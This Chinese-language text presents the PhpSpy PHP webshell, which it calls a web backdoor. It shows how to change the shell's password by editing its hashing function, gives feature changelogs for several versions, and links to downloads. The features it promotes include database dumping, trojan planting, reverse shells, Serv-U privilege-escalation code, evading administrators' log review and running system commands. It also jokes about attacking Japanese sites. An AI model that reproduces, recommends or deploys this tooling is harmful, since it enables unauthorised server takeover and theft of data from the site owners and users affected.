以2011版为例---/*=====================程序配置=====================*///echoencode_pass('angel');exit;//angel=ec38fe2a8497e0a8d6d349b3533038cb//如果需要密码验证,请修改登陆密码,留空为不需要验证$pass='ec38fe2a8497e0a8d6d349b3533038cb';//angel下面是修改密码:默认密码是angel=ec38fe2a8497e0a8d6d349b3533038cb拿到CMD5破,破解不出--。这是好事,免得shell到别人手上密码给人知道了!看看加密函数:functionencode_pass($pass){$pass=md5('angel'.$pass);$pass=md5($pass.'angel');$pass=md5('angel'.$pass.'angel');return$pass;其实修改密码很简单,只需要用原来的加密函数输出键入密码的加密字符。将2137行的加密函数return$pass;改为echo$pass;然后访问Shell文件访问时,在Login框内输入123,即可输出加密好的编码将加密好的编码修改至$pass='eb0a2bab6574ef8557eaa885230a1ece';//密码:123再将2137行的加密函数echo$pass;改为return$pass;保存就好了这样默认的密码就是123了另外还有两种加密方式一个是基于MD5加密的另个是明文的就不一一介绍了另本人汉化了一下如有需要请在下面留言到时候联系文件管理器MySQL管理器
PHPSPY2013的功能主要还是以文件管理、数据库管理、执行命令、查看系统信息为主。目前改进如下。删除通过数据库上传、下载文件,因为这个功能需要连接数据库的用户拥有FILE权限,有一定的局限性,而且不常用。所以删除以达到缩小体积的目的。需要用的可以用PHPSPY2011。增强导出数据的兼容性。以方便拖库的同学。已经测试过两个不同语言不同编码的800万条数据的库。导出文件大小1G。6分钟。无错导出并且能无错导入。并且能显示正确的编码文字。爽了。删除数据库的插入、编辑功能。这个功能当初是为了考虑数据库挂马方便。但是现在挂马的很少了。而且完全可以自己执行SQL语句来实现。所以阉割掉了。需要用的可以用PHPSPY2011。优化文件管理部分的JS代码,尽量精简又不影响使用。增加编码功能,以前是在数据库管理可以选择编码。现在在任何功能上也能选择更多编码了。可以更加方便的看到返回信息。支持日文,方便更多有志青年搞死他们。去掉windows以组件方式执行命令的功能。只保留单一的采用PHP内置函数执行命令的功能。太少碰到需要用windows组件执行命令的情况了。有需求使用PHPSPY2011。去掉查看数据库查询结果分页功能,反正我是几乎用不到。都是手工输入语句的。再说了,MYSQL的LIMIT太强大了。手工吧。这样可以精简很多代码。如果有需求请使用PHPSPY2011。增加文件管理按文件名、修改时间、大小排序查看功能。更加方便筛选自己想知道的信息。增加数据库的表按表名、创建时间、修改时间、记录数、大小排序查看功能。更加方便筛选到自己想找的表。去掉搜索文件内容内包含指定字符的功能。因为大多数情况可以用find命令,也可以打包下来分析查找。调查显示这个功能并不是很多人使用。需要的请用PHPSPY2011。去掉查找指定目录内所有可写文件的功能。这个功能通常是留一句话后门使用。感觉用处也不大。但是保留查找可写目录的功能。这个功能比较常用。有需要用的请使用PHPSPY2011。若干优化和代码精简……加密版本:2013加密.zip未加密版本:2013未加密.zip
项目信息发布时间:2011-05-08项目作者:angel项目类别:WEB后门工作环境:PHP项目版本:20112011地址:http://www.4ngel.net/project/phpspy_2011.rar2008地址:http://www.4ngel.net/project/phpspy_2008.rar2006地址:http://www.4ngel.net/project/phpspy_2006.rar2005地址:http://www.4ngel.net/project/phpspy_2005.rar1.5下载:http://www.4ngel.net/project/phpspy_v1.5.rar项目介绍 PhpSpy是一个用PHP语言编写的在线管理程序,同时集成很多和海阳顶端网所类似的功能,也可以说是一个WEB方式的后门,结合现有的攻击手法,本着实用、简洁、小巧的原则,开发了这个程序。由于程序性质问题,公开提供下载的版本不会提供更多的操作。例如MSSQL连接、WIN主机反弹等。2011功能列表(基于2008)大量改写程序代码,大大提高执行效率。人性化的文件管理界面增加端口扫描功能优化MYSQL操作代码,兼容各种版本和编码的数据库……2008功能列表(基于2006)加强cookie功能。改成全英文版并根据数据库的编码设置声明相应的页面编码,以确保各编码服务器能正常输出。加强文件管理功能,增加批量删除文件。增加新的文件属性显示方式和宿主。增加目录改名。增加查看网站根目录和当前目录下的所有可写子目录。在WIN主机下自动探测所有分区以及分区类型。增加通过MYSQL方式上传下载文件,其中下载文件不需要数据库用户具有FILE权限。即可完整下载。程序自动判断两种方式下载。上传需要具有FILE权限。加强MYSQL数据库管理功能,增加查询回显并带分页显示,增加插入、修改、删除记录。增加查看表结构和常用信息、删除表功能。并支持多句同时运行。增加执行PHP代码功能,并附加一些有用的PHP代码。例如Serv-U本地提权利用代码,适用于6.4以及一下版本,以及MYSQL反弹SHELL等。增强执行命令功能。简化一些PHP环境变量显示。大大提高各个操作的效率,尤其是文件管理。加快多文件目录的输出速度。基本全部改为POST方式提交数据和跳转。大大的增加了隐蔽性。防止管理员查看日志找出端倪。增加linux主机端口反弹功能。使用PERL和C双重实现。……2006功能列表(基于2005)用函数生成页面中的表格,体积比不用函数生成的时候减少了7kb,比全功能海阳2006小39kb去掉了SESSION认证,提高兼容性增加在WIN服务器上执行命令/程序的操作增加在WIN服务器上对注册表的操作增加在线HTTP代理功能增加直接下载MYSQL备份文件增加文件名改名增加了克隆时间和自定义文件时间2005版登陆要点按钮,这个版本直接回车删除了几个地方的垃圾多余代码,换更加简练的方式写修改了他妈的多处细节,更加流氓化2005功能列表(基于1.5)完整版(39.1K)增加选定文件打包下载增加备份指定数据库增加显示主机名和IP增建文件创建时间和最后修改时间的比较修正几个小BUG优化部分代码精简版(20.7K)删除新建目录功能删除文件属性修改功能删除PHP环境变量功能删除Session的验证方式增加显示主机名和IP修正几个小BUG优化部分代码1.5功能列表(基于1.0)支持MySQL语句执行修正登陆验证的BUG增加三个执行系统命令的函数正确识别各个文件的URL修正下载文件下了多余的HTML代码的BUG用户可查看自定义PHP配置参数大幅度优化、修正程序代码,修正若干细节1.0功能列表在线新建文件、文件夹,在权限允许的情况下可完全控制文件,具备一般文件管理所具备的功能。在权限允许的情况下,可下载任何硬盘上存在的文件。可以很好的修改目录以及文件的权限(不是win那种,是*nix的0XXX那种,win系统下也可以操作)。比其他的同类程序更好的识别URL,完美解决浏览器某些特殊字符的编码问题(现有的程序,没有一个可以很好识别某些特殊字符的)。会自动探测被禁用函数而决定某些操作。会自动探测安全模式的状态而决定某些操作。安全模式关闭的情况下,可选择用system、passthru两种函数执行系统命令。没有开发某些多余的操作,精简,实用,体积仅22.3K,仅仅是海阳顶端网ASP木马2004的1/2。在phpinfo函数被禁用的情况下,可以进入“PHP环境变量”获得很多有用的信息。可选择是否需要登陆验证,同时可以通过配置选择session和cookie两种方式进行验证。更多功能请自己挖掘……